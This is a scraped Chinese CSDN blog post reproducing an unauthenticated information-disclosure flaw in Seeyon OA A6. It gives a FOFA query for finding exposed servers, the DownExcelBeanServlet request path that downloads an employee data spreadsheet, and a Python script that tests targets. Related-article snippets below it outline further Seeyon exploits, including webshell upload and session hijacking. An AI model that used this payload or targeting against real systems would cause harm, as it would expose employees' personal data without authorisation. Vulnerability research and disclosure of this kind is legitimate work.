致远OA A6 员工敏感信息泄露

最新推荐文章于 2024-07-07 08:49:06 发布
最新推荐文章于 2024-07-07 08:49:06 发布
阅读量9.1k 收藏 5
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42660246/article/details/116176625
版权

致远OAA6 敏感信息泄露 漏洞复现 POC 修复策略
关键词由CSDN通过智能技术生成

致远OA A6 员工敏感信息泄露

1.漏洞描述

seeyon OA A6版本存在敏感信息泄露漏洞,攻击者可构造payload,获取敏感信息。

2.复现过程

fofa:app=“致远A6”
在这里插入图片描述

payload:/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
浏览器访问https://IP:PORT/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
在这里插入图片描述

获取到员工信息excel表。

3.POC

import requests


target = "http://IP:PORT"
url = target + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
res = requests.get(url, verify=False)
if res.status_code == 200 and b"[Content_Types].xml" in res.content and b"Excel.Sheet" in res.content:
    print("success")
else:
    print("no vulnerability")

4.refer

https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md

GreatBug333
关注
【1day】致远OA系统A6版本敏感信息泄漏漏洞学习(4个)
记录并分享学习安全的知识点..
05-04 7369
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、分类 二、致远OA A6 config.jsp 敏感信息泄漏漏洞 (一)概述 (二)漏洞复现 三、致远OA A6 initDataAssess.jsp 用户敏感信息泄露漏洞 (一)概述 (二)漏洞复现 四、致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞 (一)概述 (二)漏洞复现 五、致远OA A6 DownExcelBeanServlet 用户敏感信息泄露 (一)概述 (.
致远OA漏洞学习——A6版本Session泄漏伪造漏洞
记录并分享学习安全的知识点..
05-08 2981
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 1.获取到所有用户的SessionID ,请求: 2.开始进行伪装,bp遍历替换其中一个Session值: 3.bp开始抓包放包得到如下页面: 4.访问/yyoa/portal/portalIndex.jsp进入首页 一、概述 通过使用存在漏洞的请求时,会回显所有在线用户的Session值,导致出现任意登录的情况,漏洞使用前提是必须系统是有人登录的。 二...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2528
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
PeiQi0#PeiQi-WIKI-Book#致远OA A6 createMysql.jsp 数据库敏感信息泄露1
07-25
致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞描述致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以
fbion#PeiQi-WIKI-POC#致远OA A6 DownExcelBeanServlet 用户敏感信息泄露1
07-25
致远OA A6 DownExcelBeanServlet 用户敏感信息泄露漏洞描述致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息漏洞影
致远OA漏洞复现
热门推荐
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
致远oa a6 用户敏感信息泄露
09-27
致远OA A6用户敏感信息泄露事件是一个严重的安全漏洞,给用户的隐私和数据安全造成了重大威胁。根据目前的报道和了解,此漏洞可能使黑客能够非法访问用户敏感信息,对用户的个人隐私和公司数据造成不可挽回的损失...
【1day】致远OA系统A6版本test.jsp 文件上传学习
记录并分享学习安全的知识点..
05-08 2014
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 目录 警告 一、概述 二、影响版本 三、漏洞复现 1.漏洞验证(查看数据库安装路径): 2.通过安装路径,推断出web根目录D:/UFseeyon/OA/tomcat/webapps/yyoa,先写入一个jsp小马: 3.这里因为 jsp木马存在特殊符号,使用 hex编码 上传允许文件上传的jsp文件,因此hex再进行编码 ​4.通过 into outfile 写入文件,exp如下: 5.利用小马进行命令执行: 一、概述.
致远OA敏感信息泄露漏洞合集(含批量检测POC)
最新发布
Innocence_0的博客
07-07 1568
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
致远OA-A8系统的0day远程命令执行的实战-附件资源
03-02
致远OA-A8系统的0day远程命令执行的实战-附件资源
【漏洞复现】致远OA移动智能办公平台存在Session敏感信息泄露漏洞
qq_34780861的博客
05-07 1209
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息
致远OA文件上传漏洞(含批量检测POC)
今天是几号的博客
03-21 1万+
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1。
致远OA检测工具-seeyon_exp
SuperherRo的博客
09-21 1679
致远OA综合利用工具
致远A6-m协同管理软件任意文件上传漏洞复现
qq_36334672的博客
03-04 771
致远A6-m协同管理软件doUpload.jsp接口存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传恶意文件,从而控制服务器。
致远(用友)OA或M1 漏洞复现
ccz4854的博客
08-09 5462
致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器。
【漏洞复现】用友OA用户信息泄露
失心少年
10-27 455
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!通过该接口可下载oa用户信息文件。
又是一年金九银十!java编程思想哪个版本好
m0_57541165的博客
07-13 161
Spring面试高频问题 SpringMVC面试高频问题 MyBatis面试高频问题 SpringBoot面试高频题 SpringCloud面试高频问题 Redis高级面试题 Dubbo高频常问面试问题 Java虚拟机(JVM) MySQL数据库高频面试问题 Java高频面试专题合集解析: 当然在这还有更多整理总结的Java进阶学习笔记和面试题未展示,在这也是免费分享给那些有需要的朋友,其中囊括了Dubbo、Redis、Netty、zookeeper、Spring cloud、分布式、高
Java_OAexp工具设计及实现-Thelostworld_OA
thelostworld
05-02 3612
本文约1700字,阅读约需6分钟。本文主要介绍基于JavaFX图形化界面开发的快速OA类利用工具。笔者收集和整理了目前工具的OA类验证及其利用的方式和方法,整合成一个方便快捷图形化的快速利用工具。想要写这个工具的原因,主要是日常工作中,OA漏洞利用总是需要去找无数验证脚本,操作繁琐。为了方便日常渗透测试,简单快捷地进行OA利用渗透,方便团队提升效率,笔者撰写了这款工具。设计初期,笔者收集和查看了一些师傅所撰写的OA利用相关工具和文章,都是部分漏洞的利用和探测,比较单一。在这个情况下,笔者把现存披露的漏洞利用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值